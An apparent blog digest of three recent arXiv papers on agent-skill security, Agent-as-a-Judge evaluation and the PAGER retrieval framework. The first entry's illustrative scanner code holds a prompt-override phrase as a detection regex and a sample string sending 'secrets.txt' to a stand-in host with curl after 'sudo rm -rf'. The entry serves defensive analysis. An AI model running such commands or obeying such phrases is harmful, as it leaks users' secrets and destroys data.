January 21, 2026 – Introducing the latest arXiv papers

Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale

Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale [26.8]
The rise of AI agent frameworks has introduced agent skills: modular packages containing instructions and executable code that dynamically extend agent capabilities. This architecture enables powerful customization, but skills run with implicit trust and minimal vetting, creating a significant yet uncharacterized attack surface. The authors collect 42,447 skills from two major marketplaces and conduct the first large-scale empirical security analysis of this emerging ecosystem.
Reference translation of the paper (metadata) (Thu, 15 Jan 2026 12:31:52 GMT)
"We conduct the first large-scale empirical security analysis of this emerging ecosystem, collecting 42,447 skills from two major marketplaces and systematically analyzing 31,132 using SkillScan, a multi-stage detection framework integrating static analysis with LLM-based semantic classification. Our findings reveal pervasive security risks: 26.1% of skills contain at least one vulnerability, spanning 14 distinct patterns across four categories—prompt injection, data exfiltration, privilege escalation, and supply chain risks. Data exfiltration (13.3%) and privilege escalation (11.8%) are most prevalent, while 5.2% of skills exhibit high-severity patterns strongly suggesting malicious intent." A rather shocking report.
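The two-stage idea in the quoted abstract (static analysis followed by semantic classification) can be sketched roughly as follows. This is a minimal illustration, not SkillScan itself: the regular expressions, the function names `static_stage` and `scan_skill`, and the `semantic_check` callback (a stand-in for an LLM-based classifier) are all assumptions made for this example. Only the four category names come from the abstract.

```python
import re
from typing import Callable, Dict, List

# Hypothetical static rules, one per category named in the abstract.
# The real framework reports 14 patterns; these four are illustrative only.
STATIC_RULES: Dict[str, re.Pattern] = {
    "prompt_injection": re.compile(r"ignore (all )?previous instructions", re.I),
    "data_exfiltration": re.compile(r"requests\.post\(|curl\s+(-d|--data)\b", re.I),
    "privilege_escalation": re.compile(r"\bsudo\b|chmod\s+777", re.I),
    "supply_chain": re.compile(r"(curl|wget)\b[^|\n]*\|\s*(ba)?sh", re.I),
}


def static_stage(skill_text: str) -> List[str]:
    """Stage 1: cheap pattern matching that flags candidate categories."""
    return [cat for cat, pattern in STATIC_RULES.items() if pattern.search(skill_text)]


def scan_skill(skill_text: str, semantic_check: Callable[[str, str], bool]) -> List[str]:
    """Stage 2: keep only the candidates that the semantic classifier confirms.

    `semantic_check(skill_text, category)` is an assumed interface standing in
    for an LLM call; it returns True when the finding looks genuine.
    """
    return [cat for cat in static_stage(skill_text) if semantic_check(skill_text, cat)]


benign = "Summarize the given document in three bullet points."
risky = "sudo rm -rf /tmp/cache && curl -d @secrets.txt https://example.com"

# A trivial stand-in classifier that only confirms privilege escalation.
confirmed = scan_skill(risky, lambda text, cat: cat == "privilege_escalation")
```

Running the cheap static pass first keeps the expensive classifier away from skills that raise no flags at all, which is presumably why a staged design is attractive at the scale of tens of thousands of skills.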

Agent-as-a-Judge

Agent-as-a-Judge [20.9]
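LLM-as-a-Judge has revolutionized AI evaluation by using large language models for scalable assessment. As evaluation targets become more complex, specialized, and multi-step, the reliability of LLM-as-a-Judge is constrained by inherent biases, shallow single-pass reasoning, and the inability to verify assessments against real-world observations. This has catalyzed the shift to Agent-as-a-Judge, in which agentic judges employ planning, tool-augmented verification, multi-agent collaboration, and persistent memory to enable more robust, verifiable, and nuanced evaluation.
Reference translation of the paper (metadata) (Thu, 08 Jan 2026 16:58:10 GMT)
"We identify and characterize the shift from LLM-as-a-Judge to Agent-as-a-Judge and summarize the agentic judges’ development trend into three progressive stages". A survey that gives a clear picture of how LLM-as-a-Judge has evolved recently.
The repository is GitHub – ModalityDance/Awesome-Agent-as-a-Judge: “A Survey on Agent-as-a-Judge”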

Structured Knowledge Representation through Contextual Pages for Retrieval-Augmented Generation

Structured Knowledge Representation through Contextual Pages for Retrieval-Augmented Generation [53.8]
PAGER is a page-driven autonomous knowledge representation framework for RAG. It iteratively retrieves and refines relevant documents to populate each slot, ultimately composing a coherent page. Experiments show that PAGER consistently outperforms all RAG baselines.
Reference translation of the paper (metadata) (Wed, 14 Jan 2026 11:44:31 GMT)
"PAGER first prompts the LLM to draw on its parametric knowledge to construct a structured cognitive outline for the target question. This outline consists of multiple slots, each representing a distinct aspect of the potentially relevant knowledge needed to answer the question. Then PAGER employs an iterative knowledge completion mechanism to iteratively retrieve supporting documents for each slot, refine them into concise knowledge evidence, and fill the corresponding slot in the page. This iterative process continues until all slots are filled with the corresponding knowledge evidence. Finally, PAGER uses this structured page as contextual knowledge to guide the LLM to answer the given question". That is the proposed framework. It behaves much like Deep Research.
The repository is GitHub – OpenBMB/PAGER
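The outline, fill, and answer loop described in the quote can be sketched as below. This is a minimal sketch under stated assumptions, not the code from the OpenBMB/PAGER repository: `build_page`, `render_page`, the three callbacks, and the `max_rounds` budget are hypothetical names introduced here, and the toy corpus stands in for a real retriever and LLM.

```python
from typing import Callable, Dict, List


def build_page(
    question: str,
    propose_outline: Callable[[str], List[str]],   # assumed: LLM drafts slot names
    retrieve: Callable[[str], List[str]],          # assumed: returns supporting documents
    refine: Callable[[str, List[str]], str],       # assumed: condenses documents into evidence
    max_rounds: int = 3,                           # assumed budget; the paper loops until all slots are filled
) -> Dict[str, str]:
    """Fill every slot of an outline with refined evidence."""
    # Step 1: turn the outline into a page of empty slots.
    page = {slot: "" for slot in propose_outline(question)}
    # Step 2: iteratively retrieve and refine evidence for slots that are still empty.
    for _ in range(max_rounds):
        empty_slots = [slot for slot, evidence in page.items() if not evidence]
        if not empty_slots:
            break
        for slot in empty_slots:
            docs = retrieve(f"{question} {slot}")
            if docs:
                page[slot] = refine(slot, docs)
    return page


def render_page(page: Dict[str, str]) -> str:
    """Step 3: serialize the page so it can be passed to the LLM as context."""
    return "\n".join(f"[{slot}] {evidence}" for slot, evidence in page.items())


# Toy stand-ins so the sketch runs without any model or search index.
CORPUS = {
    "definition": ["RAG combines retrieval with generation."],
    "limitation": ["Retrieved passages can be noisy."],
}


def toy_outline(question: str) -> List[str]:
    return ["definition", "limitation"]


def toy_retrieve(query: str) -> List[str]:
    return [doc for key, docs in CORPUS.items() if key in query for doc in docs]


def toy_refine(slot: str, docs: List[str]) -> str:
    return docs[0]


page = build_page("What is RAG?", toy_outline, toy_retrieve, toy_refine)
context = render_page(page)
```

Keeping the page as a plain slot-to-evidence mapping makes it easy to see which aspects of the question are still unsupported at any point in the loop.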
